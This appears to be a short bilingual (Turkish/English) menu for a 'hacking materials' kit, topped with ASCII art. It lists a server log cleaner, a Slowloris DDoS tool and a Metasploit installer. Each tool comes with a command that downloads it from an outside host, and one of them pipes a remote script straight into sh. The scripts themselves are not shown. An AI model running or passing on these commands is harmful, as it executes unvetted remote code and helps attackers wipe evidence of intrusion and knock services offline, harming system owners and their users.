              $$\                 
              $$ |                
$$\  $$\  $$\ $$$$$$$\   $$$$$$\  
$$ | $$ | $$ |$$  __$$\ $$  __$$\ 
$$ | $$ | $$ |$$ |  $$ |$$ /  $$ |
$$ | $$ | $$ |$$ |  $$ |$$ |  $$ |
\$$$$$\$$$$  |$$ |  $$ |\$$$$$$  |
 \_____\____/ \__|  \__| \______/ 
                                  
                                  
                                  
~Hacking Materyaller~
1-> VDS Log Temizleyici | VDS Log Cleaner
2-> DDOS (Slowloris)
3-> Basit Metasploit Yükleme | Metasploit easy installer
~~~---~~~
Komutlar | Commands
1-> wget https://monodram.net/shell/logsil
2-> wget https://monodram.net/shell/ddos
3-> curl https://monodram.net/shell/msfyukle | sh
